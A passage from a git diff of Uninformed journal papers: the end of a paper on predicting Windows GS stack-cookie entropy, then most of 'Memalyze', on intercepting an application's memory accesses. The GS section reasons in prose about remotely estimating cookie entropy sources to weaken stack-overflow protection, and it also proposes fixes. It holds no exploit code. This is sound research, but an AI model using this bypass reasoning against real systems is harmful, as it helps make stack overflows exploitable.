crash was generated. This isn't fool proof, but it should be +possible to get fairly close. + +Determining process and thread identifier could be tricky, especially if the +system has been up for some time. The author is not aware of a general +purpose technique that could be used to determine this information remotely. +Fortunately, the process and thread identifier have very little effect on high +order bits. + +The system uptime is an interesting one. In the past, there have been +techniques that could be used to estimate the uptime of the system through the +use of TCP timestamps and other network protocol anomalies. At the time of +this writing, the author is not aware of how prevalent or useful these +techniques are against modern operating systems. Should they still be +effective, they would represent a particularly useful way of obtaining a +system's uptime. If an attacker can obtain both the creation time of the +process and the uptime of the system, it's possible to calculate the tick +count and performance counter values with varying degrees of accuracy. + +The performance counter will still pose a great challenge in the remote +scenario. The reliance on the performance frequency shouldn't be seen as an +unknown quantity. As far as the author is aware, the performance frequency on +modern processors is generally 3579545, though there may be certain power +situations that would cause it to be different. + +It is also important to note that the current attack assumes that the load +time for an image that has a GS cookie is equivalent to the initial thread's +creation time. For example, if a DLL were loaded much later in process +execution, such as through instantiating a COM object in Internet Explorer, it +would not be possible to assume that initial thread creation time is equal to +the system time that was obtained when the DLL's GS cookie was generated. +This brings about an interesting point for the remote scenario, however. If +an attacker can control the time at which a DLL is loaded, it may be possible +for them to infer the value of system time that is used without even having to +directly query it. One example of this would be in the context of internet +explorer, where the client's date and time functionality might be abused to +obtain this information. + +8) Conclusion + +The ability to reduce the amount of effective entropy in a GS cookie can +improve an attacker's chances of guessing the cookie. This paper has +described two techniques that may be used to calculate or infer the values of +certain bits in a GS cookie. The first approach involves a local attacker's +ability to collect information that makes it possible to calculate, with +pretty good accuracy, the values of the entropy sources that were used at the +time that a cookie was generated. The second approach describes the potential +for abusing the limited entropy associated with boot start services. + +While the results shown in this paper do not represent a complete break of GS, +they do hint toward a general weakness in the way that GS cookies are +generated. This is particularly serious given the fact that GS is a compile +time solution. If the techniques described in this document are refined, or +new and improved techniques are identified, a complete break of GS would +require the recompilation of all affected binaries. The implications of this +should be obvious. The ability to reliably predict the value of a GS cookie +would effectively nullify any benefits that GS adds. It would mean that all +stack-based buffer overflows would immediately become exploitable. + +To help contribute to the improvement of GS, a few different solutions were +described that could either partially or wholly address some of the weakness +that were identified. The most interesting of these solutions involves +modifying the GS implementation to make use of a external cookie generator, +such as the kernel. Going this route would ensure that any weaknesses found +in the cookie generation algorithm could be simply addressed through a patch +to the kernel. This is much more reasonable than expecting all existing GS +enabled binaries to be recompiled. + +It's unclear whether the techniques presented in this paper will have any +appreciable effect on future exploits. Only time will tell. + +References + +[1] Cowan, Crispin et al. StackGuard: Automatic Adaptive Detection and Prevention of Buffer-Overflow Attacks. + http://www.usenix.org/publications/library/proceedings/sec98/full_papers/cowan/cowan_html/cowan.html; accessed 3/18/2007. + +[2] Etoh, Hiroaki. GCC extension for protecting applications from stack-smashing attacks. + http://www.research.ibm.com/trl/projects/security/ssp/; accessed 3/18/2007. + +[3] eEye. Memory Retrieval Vulnerabilities. + http://research.eeye.com/html/Papers/download/eeyeMRV-Oct2006.pdf; accessed 3/18/2007. + +[4] Litchfield, David. Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server + http://www.nextgenss.com/papers/defeating-w2k3-stack-protection.pdf; accessed 3/18/2007. + +[5] Microsoft Corporation. /GS (Buffer Security Check). + http://msdn2.microsoft.com/en-us/library/8dbf701c(VS.80).aspx; accessed 3/18/2007. + +[6] Microsoft Corporation. /SAFESEH (Image has Safe Exception Handlers). + http://msdn2.microsoft.com/en-us/library/9a89h429(VS.80).aspx; accessed 3/18/2007. + +[7] Microsoft Corporation. QueryPerformanceFrequency Function. + http://msdn2.microsoft.com/en-us/library/ms644905.aspx; accessed 3/18/2007 + +[8] Microsoft Corporation. QueryPerformanceCounter Function. + http://msdn2.microsoft.com/en-us/library/ms644904.aspx; accessed 3/18/2007 + +[9] Ren, Chris et al. Microsoft Compiler Flaw Technical Note + http://www.cigital.com/news/index.php?pg=art&artid=70; accessed 3/18/2007. + +[10] Whitehouse, Ollie. Analysis of GS protections in Windows Vista + http://www.symantec.com/avcenter/reference/GS_Protections_in_Vista.pdf; accessed 3/20/2007. diff --git a/uninformed/7.2.txt b/uninformed/7.2.txt new file mode 100644 index 0000000..5df64d7 --- /dev/null +++ b/uninformed/7.2.txt @@ -0,0 +1,800 @@ +Memalyze: Dynamic Analysis of Memory Access Behavior in Software +skape +mmiller@hick.org +4/2007 + +Abstract + +This paper describes strategies for dynamically analyzing an application's +memory access behavior. These strategies make it possible to detect when a +read or write is about to occur at a given location in memory while an +application is executing. An application's memory access behavior can provide +additional insight into its behavior. For example, it may be able to provide +an idea of how data propagates throughout the address space. Three individual +strategies which can be used to intercept memory accesses are described in +this paper. Each strategy makes use of a unique method of intercepting memory +accesses. These methods include the use of Dynamic Binary Instrumentation +(DBI), x86 hardware paging features, and x86 segmentation features. A +detailed description of the design and implementation of these strategies for +32-bit versions of Windows is given. Potential uses for these analysis +techniques are described in detail. + +1) Introduction + +If software analysis had a holy grail, it would more than likely be centered +around the ability to accurately model the data flow behavior of an +application. After all, applications aren't really much more than +sophisticated data processors that operate on varying sets of input to produce +varying sets of output. Describing how an application behaves when it +encounters these varying sets of input makes it possible to predict future +behavior. Furthermore, it can provide insight into how the input could be +altered to cause the application to behave differently. Given these benefits, +it's only natural that a discipline exists that is devoted to the study of +data flow analysis. + +There are a two general approaches that can be taken to perform data flow +analysis. The first approach is referred to as static analysis and it +involves analyzing an application's source code or compiled binaries without +actually executing the application. The second approach is dynamic analysis +which, as one would expect, involves analyzing the data flow of an application +as it executes. The two approaches both have common and unique benefits and +no argument will be made in this paper as to which may be better or worse. +Instead, this paper will focus on describing three strategies that may be used +to assist in the process of dynamic data flow analysis. + +The first strategy involves using Dynamic Binary Instrumentation (DBI) to +rewrite the instruction stream of the executing application in a manner that +makes it possible to intercept instructions that read from or write to memory. +Two well-known examples of DBI implementations that the author is familiar +with are DynamoRIO and Valgrind[3, 11]. The second strategy that will be +discussed involves using the hardware paging features of the x86 and x64 +architectures to trap and handle access to specific pages in memory. Finally, +the third strategy makes use of the segmentation features included in the x86 +architecture to trap memory accesses by making use of the null selector. +Though these three strategies vary greatly, they all accomplish the same goal +of being able to intercept memory accesses within an application as it +executes. + +The ability to intercept memory reads and writes during runtime can support +research in additional areas relating to dynamic data flow analysis. For +example, the ability to track what areas of code are reading from and writing +to memory could make it possible to build a model for the data propagation +behaviors of an application. Furthermore, it might be possible to show with +what degree of code-level isolation different areas of memory are accessed. +Indeed, it may also be possible to attempt to validate the data consistency +model of a threaded application by investigating the access behaviors of +various regions of memory which are referenced by multiple threads. These are +but a few of the many potential candidates for dynamic data flow analysis. + +This paper is organized into three sections. Section 2 gives an introduction +to three different strategies for facilitating dynamic data flow analysis. +Section 3 enumerates some of the potential scenarios in which these strategies +could be applied in order to render some useful information about the data +flow behavior of an application. Finally, section 4 describes some of the +previous work whose concepts have been used as the basis for the research +described herein. + +2) Strategies + +This section describes three strategies that can be used to intercept runtime +memory accesses. The strategies described herein do not rely on any static +binary analysis. Techniques that do make use of static binary analysis are +outside of the scope of this paper. + +2.1) Dynamic Binary Instrumentation + +Dynamic Binary Instrumentation (DBI) is a method of analyzing the behavior of +a binary application at runtime through the injection of instrumentation code. +This instrumentation code executes as part of the normal instruction stream +after being injected. In most cases, the instrumentation code will be +entirely transparent to the application that it's been injected to. Analyzing +an application at runtime makes it possible to gain insight into the behavior +and state of an application at various points in execution. This highlights +one of the key differences between static binary analysis and dynamic binary +analysis. Rather than considering what may occur, dynamic binary analysis has +the benefit of operating on what actually does occur. This is by no means +exhaustive in terms of exercising all code paths in the application, but it +makes up for this by providing detailed insight into an application's concrete +execution state. + +The benefits of DBI have made it possible to develop some incredibly advanced +tools. Examples where DBI might be used include runtime profiling, +visualization, and optimization tools. DBI implementations generally fall +into two categories: light-weight or heavy-weight. A light-weight DBI +operates on the architecture-specific instruction stream and state when +performing analysis. A heavy-weight DBI operates on an abstract form of the +instruction stream and state. An example a heavy-weight DBI is Valgrind which +performs analysis on an intermediate representation of the machine state[11, +7]. An example of a light-weight DBI is DynamoRIO which performs analysis +using the architecture-specific state[3]. The benefit of a heavy-weight DBI +over a light-weight DBI is that analysis code written against the intermediate +representation is immediately portable to other architectures, whereas +light-weight DBI analysis implementations must be fine-tuned to work with +individual architectures. While Valgrind is a novel and interesting +implementation, it is currently not supported on Windows. For this reason, +attention will be given to DynamoRIO for the remainder of this paper. There are +many additional DBI frameworks and details, but for the sake of limiting scope +these will not be discussed. The reader should consult reference material to +learn more about this subject[11]. + +DynamoRIO is an example of a DBI framework that allows custom instrumentation +code to be integrated in the form of dynamic libraries. The tool itself is a +combination of Dynamo, a dynamic optimization engine developed by researchers +at HP, and RIO, a runtime introspection and optimization engine developed by +MIT. The fine-grained details of the implementation of DynamoRIO are outside +of the scope of this paper, but it's important to understand the basic +concepts[2]. + +At a high-level, figure 1 from Transparent Binary Optimization provides a +great visualization of the process employed by Dynamo[2]. In concrete terms, +Dynamo works by processing an instruction stream as it executes. To +accomplish this, Dynamo assumes responsibility for the execution of the +instruction stream. It uses a disassembler to identify the point of the next +branch instruction in the code that is about to be executed. The set of +instructions disassembled is referred to as a fragment (although, it's more +commonly known as a basic block). If the target of the branch instruction is +in Dynamo's fragment cache, it executes the (potentially optimized) code in +the fragment cache. When this code completes, it returns control to Dynamo to +disassemble the next fragment. If at some point Dynamo encounters a branch +target that is not in its fragment cache, it will add it to the fragment cache +and potentially optimize it. This is the perfect opportunity for +instrumentation code to be injected into the optimized fragment that is +generated for a branch target. Injecting instrumentation code at this level +is entirely transparent to the application. While this is an +oversimplification of the process used by DynamoRIO, it should at least give +some insight into how it functions. + +One of the best features of DynamoRIO from an analysis standpoint is that it +provides a framework for inserting instrumentation code during the time that a +fragment is being inserted into the fragment cache. This is especially useful +for the purposes of intercepting memory accesses within an application. When +a fragment is being created, DynamoRIO provides analysis libraries with the +instructions that are to be included in the fragment that is generated. To +optimize for performance, DynamoRIO provides multiple levels of disassembly +information. At the most optimized level, only very basic information +about the instructions is provided. At the least optimized level, very +detailed information about the instructions and their operands can be +obtained. Analysis libraries are free to control the level of information +that they retrieve. Using this knowledge of DynamoRIO, it is now possible +to consider how one might design an analysis library that is able to +intercept memory reads and writes while an application is executing. + +2.1.1) Design + +DBI, and DynamoRIO in particular, make designing a solution that can intercept +memory reads and writes fairly trivial. The basic design involves having an +analysis library that scans the instructions within a fragment that is being +created. When an instruction that accesses memory is encountered, +instrumentation code can be inserted prior to the instruction. The +instrumentation code can be composed of instructions that notify an +instrumentation function of the memory operand that is about to be read from +or written to. This has the effect of causing the instrumentation function to +be called when the fragment is executed. These few steps are really all that +it takes instrument the memory access behavior of an application as it +executes using DynamoRIO. + +2.1.2) Implementation + +The implementation of the DBI approach is really just as easy as the design +description makes it sound. To cooperate with DynamoRIO, an analysis library +must implement a well-defined routine named dynamorio_basic_block which is +called by DynamoRIO when a fragment is being created. This routine is passed +an instruction list which contains the set of instructions taken from the +native binary. Using this instruction list, the analysis library can make a +determination as to whether or not any of the operands of an instruction +either explicitly or implicitly reference memory. If an instruction does +access memory, then instrumentation code must be inserted. + +Inserting instrumentation code with DynamoRIO is a pretty painless process. +DynamoRIO provides a number of macros that encapsulate the process of creating +and inserting instructions into the instruction list. For example, +INSTR_CREATE_add will create an add instruction with a specific set of arguments +and instrlist_meta_preinsert will insert an instruction prior to another +instruction within the instruction list. + +A proof of concept implementation is included with the source code provided +along with this paper. + +2.1.3) Considerations + +This approach is particularly elegant thanks to the concepts of dynamic binary +instrumentation and to DynamoRIO itself for providing an elegant framework +that supports inserting instrumentation code into the fragment cache. Since +DynamoRIO is explicitly designed to be a runtime optimization engine, the fact +that the instrumentation code is cached within the fragment cache means that +it gains the benefits of DynamoRIO's fragment optimization algorithms. When +compared to alternative approaches, this approach also has significantly less +overhead once the fragment cache begins to become populated. This is because +all of the instrumentation code is placed entirely inline with the application +code that is executing rather than having to rely on alternative means of +interrupting the normal course of program execution. Still, this approach is +not without its set of considerations. Some of these considerations are +described below: + + 1. Requires the use of a disassembler + DynamoRIO depends on its own internal disassembler. This can be a source + of problems and limitations. + + 2. Self-modifying and dynamic code + Self-modifying and dynamically generated code can potentially cause problems + with DynamoRIO. + + 3. DynamoRIO is closed source + While this has nothing to do with the actual concept, the fact that + DynamoRIO is closed source can be limiting in the event that there are + issues with DynamoRIO itself. + +2.2) Page Access Interception + +The hardware paging features of the x86 and x64 architectures represent a +potentially useful means of obtaining information about the memory access +behavior of an application. This is especially true due to the well-defined +actions that the processor takes when a reference is made to a linear address +whose physical page is either not present or has had its access restricted. +In these cases, the processor will assert the page fault interrupt (0x0E) and +thereby force the operating system to attempt to gracefully handle the virtual +memory reference. In Windows, the page fault interrupt is handled by +nt!KiTrap0E. In most cases, nt!KiTrap0E will issue a call into +nt!MmAccessFault which is responsible for making a determination about the +nature of the memory reference that occurred. If the memory reference fault +was a result of an access restriction, nt!MmAccessFault will return an access +violation error code (0xC0000005). When an access violation occurs, an +exception record is generated by the kernel and is then passed to either the +user-mode exception dispatcher or the kernel-mode exception dispatcher +depending on which mode the memory access occurred in. The job of the +exception dispatcher is to give a thread an opportunity to gracefully recover +from the exception. This is accomplished by providing each of the registered +or vectored exception handlers with the exception information that was +collected when the page fault occurred. If an exception handler is able to +recover, execution of the thread can simply restart where it left off. Using +the principles outlined above, it is possible to design a system that is +capable of both trapping and handling memory references to specific pages in +memory during the course of normal process execution. + +2.2.1) Design + +The first step that must be taken to implement this system involves +identifying a method that can be used to trap references to arbitrary pages in +memory. Fortunately, previous work has done much to identify some of the +different approaches that can be taken to accomplish this[8, 4]. For the purposes +of this paper, one of the most useful approaches centers around the ability to +define whether or not a page is restricted from user-mode access. This is +controlled by the Owner bit in a linear address' page table entry (PTE)[5]. When +the Owner bit is set to 0, the page can only be accessed at privilege level 0. +This effectively restricts access to kernel-mode in all modern operating +systems. Likewise, when the Owner bit is set to 1, the page can be accessed +from all privilege levels. By toggling the Owner bit to 0 in the PTEs +associated with a given set of linear addresses, it is possible to trap all +user-mode references to those addresses at runtime. This effectively solves +the first hurdle in implementing a solution to intercept memory access +behavior. + +Using the approach outlined above, any reference that is made from user-mode +to a linear address whose PTE has had the Owner bit set to 0 will result in an +access violation exception being passed to the user-mode exception dispatcher. +This exception must be handled by a custom exception handler that is able to +distinguish transient access violations from ones that occurred as a result of +the Owner bit having been modified. This custom exception handler must also +be able to recover from the exception in a manner that allows execution to +resume seamlessly. Distinguishing exceptions is easy if one assumes that the +custom exception handler has knowledge in advance of the address regions that +have had their Owner bit modified. Given this assumption, the act of +distinguishing exceptions is as simple as seeing if the fault address is +within an address region that is currently being monitored. While +distinguishing exceptions may be easy, being able to gracefully recovery is an +entirely different matter. + +To recover and resume execution with no noticeable impact to an application +means that the exception handler must have a mechanism that allows the +application to access the data stored in the pages whose virtual mappings have +had their access restricted to kernel-mode. This, of course, would imply that +the application must have some way, either direct or indirect, to access the +contents of the physical pages associated with the virtual mappings that have +had their PTEs modified. The most obvious approach would be to simply toggle +the Owner bit to permit user-mode access. This has many different problems, +not the least of which being that doing so would be expensive and would not +behave properly in multi-threaded environments (memory accesses could be +missed or worse). An alternative to updating the Owner bit would be to have a +device driver designed to provide support to processes that would allow them +to read the contents of a virtual address at privilege level 0. However, +having the ability to read and write memory through a driver means nothing if +the results of the operation cannot be factored back into the instruction that +triggered the exception. + +Rather than attempting to emulate the read and write access, a better approach +can be used. This approach involves creating a second virtual mapping to the +same set of physical pages described by the linear addresses whose PTEs were +modified. This second virtual mapping would behave like a typical user-mode +memory mapping. In this way, the process' virtual address space would contain +two virtual mappings to the same set of physical pages. One mapping, which +will be referred to as the original mapping, would represent the user-mode +inaccessible set of virtual addresses. The second mapping, which will be +referred to as the mirrored mapping, would be the user-mode accessible set of +virtual addresses. By mapping the same set of physical pages at two +locations, it is possible to transparently redirect address references at the +time that exceptions occur. An important thing to note is that in order to +provide support for mirroring, a disassembler must be used to figure out which +registers need to be modified. + +To better understand how this could work, consider a scenario where an +application contains a mov [eax], 0x1 instruction. For the purposes of this +example, assume that the eax register contains an address that is within the +original mapping as described above. When this instruction executes, it will +lead to an access violation exception being generated as a result of the PTE +modifications that were made to the original mapping. When the exception +handler inspects this exception, it can determine that the fault address was +one that is contained within the original mapping. To allow execution to +resume, the exception handler must update the eax register to point to the +equivalent address within the mirrored region. Once it has altered the value +of eax, the exception handler can tell the exception dispatcher to continue +execution with the now-modified register information. From the perspective of +an executing application, this entire operation will occur transparently. +Unfortunately, there's still more work that needs to be done in order to +ensure that the application continues to execute properly after the exception +dispatcher continues execution. + +The biggest problem with modifying the value of a register to point to the +mirrored address is that it can unintentionally alter the behavior of +subsequent instructions. For example, the application may not function +properly if it assumes that it can access other non-mirrored memory addresses +relative to the address stored within eax. Not only that, but allowing eax to +continue to be accessed through the mirrored address will mean that subsequent +reads and writes to memory made using the eax register will be missed for the +time that eax contains the mirrored address. + +In order to solve this problem, it is necessary to come up with a method of +restoring registers to their original value after the instruction executes. +Fortunately, the underlying architecture has built-in support that allows a +program to be notified after it has executed an instruction. This support is +known as single-stepping. To make use of single-stepping, the exception +handler can set the trap flag (0x100) in the saved value of the eflags +register. When execution resumes, the processor will generate a single step +exception after the original instruction executes. This will result in the +custom exception handler being called. When this occurs, the custom exception +handler can determine if the single step exception occurred as a result of a +previous mirroring operation. If it was the result of a mirroring operation, +the exception handler can take steps to restore the appropriate register to +its original value. + +Using these four primary steps, a complete solution to the problem of +intercepting memory accesses can be formed. First, the Owner bit of the PTEs +associated with a region of virtual memory can be set to 0. This will cause +user-mode references to this region to generate an access violation exception. +Second, an additional mapping to the set of physical pages described the +original mapping can be created which is accessible from user-mode. Third, +any access violation exceptions that reach the custom exception handler can be +inspected. If they are the result of a reference to a region that is being +tracked, the register contents of the thread context can be adjusted to +reference the user-accessible mirrored mapping. The thread can then be +single-stepped so that the fourth and final step can be taken. When a +single-step exception is generated, the custom exception handler can restore +the original value of the register that was modified. When this is complete, +the thread can be allowed to continue as if nothing had happened. + +2.2.2) Implementation + +An implementation of this approach is included with the source code released +along with this paper. This implementation has two main components: a +kernel-mode driver and a user-mode DLL. The kernel-mode driver provides a +device object interface that allows a user-mode process to create a mirrored +mapping of a set of physical pages and to toggle the Owner bit of PTEs +associated with address regions. The user-mode DLL is responsible for +implementing a vectored exception handler that takes care of processing access +violation exceptions by mirroring the address references to the appropriate +mirrored region. The user-mode DLL also exposes an API that allows +applications to create a memory mirror. This abstracts the entire process and +makes it simple to begin tracking a specific memory region. The API also +allows applications to register callbacks that are notified when an address +reference occurs. This allows further analysis of the memory access behavior +of the application. + +2.2.3) Considerations + +While this approach is most definitely functional, it comes with a number of +caveats that make it sub-optimal for any sort of large-scale deployment. The +following considerations are by no means all-encompassing, but some of the +more important ones have been enumerated below: + + 1. Unsafe modification of PTEs + It is not safe to modify PTEs without acquiring certain locks. + Unfortunately, these locks are not exported and are therefore inaccessible + to third party drivers. + + 2. Large amount of overhead + The overhead associated with having to take a page fault and pass the + exception on to the be handled by user-mode is substantial. Memory access + time with respect to the application could jump from nanoseconds to micro + or even milli seconds. + + 3. Requires the use of a disassembler + Since this approach relies on mirroring memory references from one virtual + address to another, a disassembler has to be used to figure out which + registers need to be modified with the mirrored address. Any time a + disassembler is needed is an indication that things are getting fairly + complicated. + + 4. Cannot track memory references to all addresses + The fact that this approach relies on locking physical pages prevents it + from feasibly tracking all memory references. In addition, because the + thread stack is required to be valid in order to dispatch exceptions, it's + not possible to track reads and writes to thread stacks using this + approach. + +2.3) Null Segment Interception + +Segmentation is an extremely old feature of the x86 architecture. Its purpose +has been to provide software with the ability to partition the address space +into distinct segments that can be referenced through a 16-bit segment +selector. Segment selectors are used to index either the Global Descriptor +Table (GDT) or the Local Descriptor Table (LDT). Segment descriptors convey +information about all or a portion of the address space. On modern 32-bit +operating systems, segmentation is used to set up a flat memory model +(primarily only used because there is no way to disable it). This is further +illustrated by the fact that the x64 architecture has effectively done away +with the ES, DS, and SS segment registers in 64-bit mode. While segment +selectors are primarily intended to make it possible to access memory, they +can also be used to prevent access to it. + +2.3.1) Design + +Segmentation is one of the easiest ways to trap memory accesses. The majority +of instructions which reference memory implicitly use either the DS or ES +segment registers to do so. The one exception to this rule are instructions +that deal with the stack. These instructions implicitly use the SS segment +register. There are a few different ways one can go about causing a general +protection fault when accessing an address relative to a segment selector, but +one of the easiest is to take advantage of the null selector. The null +selector, 0x0, is a special segment selector that will always cause a general +protection fault when using it to reference memory. By loading the null +selector into DS, for example, the mov [eax], 0x1 instruction would cause a +general protection fault when executed. Using the null selector solves the +problem of being able to intercept memory accesses, but there still needs to +be some mechanism to allow the application to execute normally after +intercepting the memory access. + +When a general protection fault occurs in user-mode, the kernel generates an +access violation exception and passes it off to the user-mode exception +dispatcher in much the same way as was described in 2.2. Registering a custom +exception handler makes it possible to catch this exception and handle it +gracefully. To handle this exception, the custom exception handler must +restore DS and ES segment registers to valid segment selectors by updating the +thread context record associated with the exception. On 32-bit versions of +Windows, the segment registers should be restored to 0x23. Once the the +segment registers have been updated, the exception dispatcher can be told to +continue execution. However, before this happens, there is an additional step +that must be taken. + +It is not enough to simply restore the segment registers and then continue +execution. This would lead to subsequent reads and writes being missed as a +result of the DS and ES segment registers no longer pointing to the null +selector. To address this, the custom exception handler should toggle the +trap flag in the context record prior to continuing execution. Setting the +trap flag will cause the processor to generate a single step exception after +the instruction that generated the general protection fault executes. This +single step exception can then be processed by the custom exception handler to +reset the DS and ES segment registers to the null selector. After the segment +registers have been updated, the trap flag can be disabled and execution can +be allowed to continue. By following these steps, the application is able to +make forward progress while also making it possible to trap all memory reads +and writes that use the DS and ES segment registers. + +2.3.2) Implementation + +The implementation for this approach involves registering a vectored exception +handler that is able to handle the access violation and single step exceptions +that are generated. Since this approach relies on setting the segment +registers DS and ES to the null selector, an implementation must take steps to +update the segment register state for each running thread in a process and for +all new threads as they are created. Updating the segment register state for +running threads involves enumerating running threads in the calling process +using the toolhelp library. For each thread that is not the calling thread, +the SetThreadContext routine can be used to update segment registers. The +calling thread can update the segment registers using native instructions. To +alter the segment registers for new threads, the DLLTHREADATTACH notification +can be used. Once all threads have had their DS and ES segment registers +updated, memory references will immediately begin causing access violation +exceptions. + +When these access violation exceptions are passed to the vectored exception +handler, appropriate steps must be taken to restore the DS and ES segment +registers to a valid segment selector, such as 0x23. This is accomplished by +updating the SegDs and SegEs segment registers in the CONTEXT structure that +is passed in association with an exception. In addition to updating these +segment registers, the trap flag (0x100) must also be set in the EFlags +register so that the DS and ES segment registers can be restored to the null +selector in order to trap subsequent memory accesses. Setting the trap flag +will lead to a single step exception after the instruction that generated the +access violation executes. When the single step exception is received, the +SegDs and SegEs segment registers can be restored to the null selector. + +These few steps capture the majority of the implementation, but there is a +specific Windows nuance that must be handled in order for this to work right. +When the Windows kernel returns to a user-mode process after a system call has +completed, it restores the DS and ES segment selectors to their normal value +of 0x23. The problem with this is that without some way to reset the segment +registers to the null selector after a system call returns, there is no way to +continue to track memory accesses after a system call. Fortunately, there is +a relatively painless way to reset the segment registers after a system call +returns. On Windows XP SP2 and more recent versions of Windows, the kernel +determines where to transfer control to after a system call returns by looking +at the function pointer stored in the shared user data memory mapping. +Specifically, the SystemCallReturn attribute at 0x7ffe0304 holds a pointer to +a location in ntdll that typically contains just a ret instruction as shown +below: + +0:001> u poi(0x7ffe0304) +ntdll!KiFastSystemCallRet: +7c90eb94 c3 ret +7c90eb95 8da42400000000 lea esp,[esp] +7c90eb9c 8d642400 lea esp,[esp] + +Replacing this single ret instruction with code that resets the DS and ES +registers to the null selector followed by a ret instruction is enough to make +it possible to continue to trap memory accesses after a system call returns. +However, this replacement code should not take these steps if a system call +occurs in the context of the exception dispatcher, as this could lead to a +nesting issue if anything in the exception dispatcher references memory, which +is very likely. + +An implementation of this approach is included with the source code provided +along with this paper. + +2.3.3) Considerations + +There are a few considerations that should be noted about this approach. On +the positive side, this approach is unique when compared to the others +described in this paper due to the fact that, in principle, it should be +possible to use it to trap memory accesses in kernel-mode, although it is +expected that the implementation may be much more complicated. This approach +is also much simpler than the other approaches in that it requires far less +code. While these are all good things, there are some negative considerations +that should also be pointed out. These are enumerated below: + + 1. Will not work on x64 + The segmentation approach described in this section will not work on x64 + due to the fact that the DS, ES, and even SS segment selectors are + effectively ignored when the processor is in 64-bit mode. + + 2. Significant performance overhead + Like many of the other approaches, this one also suffers from significant + performance overhead involved in having to take a GP and DB fault for + every address reference. This approach could be be further optimized by + creating a custom LDT entry (using NtSetLdtEntries) that describes a + region whose base address is 0 and length is n where n is just below the + address of the region(s) that should be monitored. This would have the + effect of allowing memory accesses to succeed within the lower portion of + the address space and fail in the higher portion (which is being + monitored). It's important to note that the base address of the LDT entry + must be zero. This is problematic since most of the regions that one + would like to monitor (heap) are allocated low in the address space. It + would be possible to work around this issue by having + NtAllocateVirtualMemory allocate using MEM\_TOP\_DOWN. + + 3. Requires a disassembler + Unfortunately, this approach also requires the use of a disassembler in + order to extract the effective address that caused the access violation + exception to occur. This is necessary because general protection faults + that occur due to a segment selector issue generate exception records that + flag the fault address as being 0xffffffff. This makes sense in the + context that without a valid segment selector, there is no way to + accurately calculate the effective address. The use of a disassembler + means that the code is inherently more complicated than it would otherwise + need to be. There may be some way to craft a special LDT entry that would + still make it possible to determine the address that cause the fault, but + the author has not investigated this. + +3) Potential Uses + +The ability to intercept an application's memory accesses is an interesting +concept but without much use beyond simple statistical and visual analysis. +Even though this is the case, the data that can be collected by analyzing +memory access behavior can make it possible to perform much more extensive +forms of dynamic binary analysis. This section will give a brief introduction +to some of the hypothetical areas that might benefit from being able to +understand the memory access behavior of an application. + +3.1) Data Propagation + +Being able to gain knowledge about the way that data propagates throughout an +application can provide extremely useful insights. For example, understanding +data propagation can give security researchers an idea of the areas of code +that are affected, either directly or indirectly, by a buffer that is received +from a network socket. In this context, having knowledge about areas affected +by data would be much more valuable than simply understanding the code paths +that are taken as a result of the buffer being received. Though the two may +seem closely related, the areas of code affected by a buffer that is received +should actually be restricted to a subset of the overall code paths taken. + +Even if understanding data propagation within an application is beneficial, it +may not be clear exactly how analyzing memory access behavior could make this +possible. To understand how this might work, it's best to think of memory +access in terms of its two basic operations: read and write. In the course of +normal execution, any instruction that reads from a location in memory can be +said to be dependent on the last instruction that wrote to that location. +When an instruction writes to a location in memory, it can be said that any +instructions that originally wrote to that location no longer have claim over +it. Using these simple concepts, it is possible to build a dependency graph +that shows how areas of code become dependent on one another in terms of a +reader/writer relationship. This dependency graph would be dynamic and would +change as a program executes just the same as the data propagation within an +application would change. + +At this point in time, the author has developed a very simple implementation +based on the DBI strategy outlined in this paper. The current implementation +is in need of further refinement, but it is capable of showing reader/writer +relationships as the program executes. This area is ripe for future research. + +3.2) Memory Access Isolation + +From a visualization standpoint, it might be interesting to be able to show +with what degrees of code-level isolation different regions of memory are +accessed. For example, being able to show what areas of code touch individual +heap allocations could provide interesting insight into the containment model +of an application that is being analyzed. This type of analysis might be able +to show how well designed the application is by inferring code quality based +on the average number of areas of code that make direct reference to unique +heap allocations. Since this concept is a bit abstract, it might make sense +to discuss a more concrete example. + +One example might involve an object-oriented C++ application that contains +multiple classes such as Circle, Shape, Triangle, and so on. In the first +design, the application allows classes to directly access the attributes of +instances. In the second design, the application forces classes to reference +attributes through public getters and setters. Using memory access behavior +to identify code-level isolation, the first design might be seen as a poor +design due to the fact that there will be many code locations where unique +heap allocations (class instances) have the contents of their memory accessed +directly. The second design, on the other hand, might be seen as a more +robust design due to the fact that the unique heap allocations would be +accessed by fewer places (the getters and setters). + +It may actually be the case that there's no way to draw a meaningful +conclusion by analyzing code-level isolation of memory accesses. One specific +case that was raised to the author involved how the use of inlining or +aggressive compiler optimizations might incorrectly indicate a poor design. +Even though this is likely true, there may be some knowledge that can be +obtained by researching this further. The author is not presently aware of an +implementation of this concept but would love to be made aware if one exists. + +3.3) Thread Data Consistency + +Programmers familiar with the pains of thread deadlocks and thread-related +memory corruption should be well aware of how tedious these problems can be to +debug. By analyzing memory access behavior in conjunction with some +additional variables, it may be possible to make determinations as to whether +or not a memory operation is being made in a thread safe manner. At this +point, the author has not defined a formal approach that could be taken to +achieve this, but a few rough ideas have been identified. + +The basic idea behind this approach would be to combine memory access behavior +with information about the thread that the access occurred in and the set of +locks that were acquired when the memory access occurred. Determining which +locks are held can be as simple as inserting instrumentation code into the +routines that are used to acquire and release locks at runtime. When a lock +is acquired, it can be pushed onto a thread-specific stack. When the lock is +released, it can be removed. The nice thing about representing locks as a +stack is that in almost every situation, locks should be acquired and released +in symmetric order. Acquiring and releasing locks asymmetrically can quickly +lead to deadlocks and therefore can be flagged as problematic. + +Determining data consistency is quite a bit trickier, however. An analysis +library would need some means of historically tracking read and write access +to different locations in memory. Still, determining what might be a data +consistency issue from this historical data is challenging. One example of a +potential data consistency issue might be if two writes occur to a location in +memory from separate threads without a common lock being acquired between the +two threads. This isn't guaranteed to be problematic, but it is at the very +least be indicative of a potential problem. Indeed, it's likely that many +other types of data consistency examples exist that may be possible to capture +in relation to memory access, thread context, and lock ownership. + +Even if this concept can be made to work, the very fact that it would be a +runtime solution isn't a great thing. It may be the case that code paths that +lead to thread deadlocks or thread-related corruption are only executed rarely +and are hard to coax out. Regardless, the author feels like this represents +an interesting area of future research. + +4) Previous Work + +The ideas described in this paper benefit greatly from the concepts +demonstrated in previous works. The memory mirroring concept described in 2.2 +draws heavily from the PaX team's work relating to their VMA mirroring and +software-based non-executable page implementations[8]. Oded Horovitz provided an +implementation of the paging approach for Windows and applied it to +application security[4]. In addition, there have been other examples that use +concepts similar to those described by PaX to achieve additional results, such +as OllyBone, ShadowWalker, and others[10, 9]. The use of DBI in 2.1 for +memory analysis is 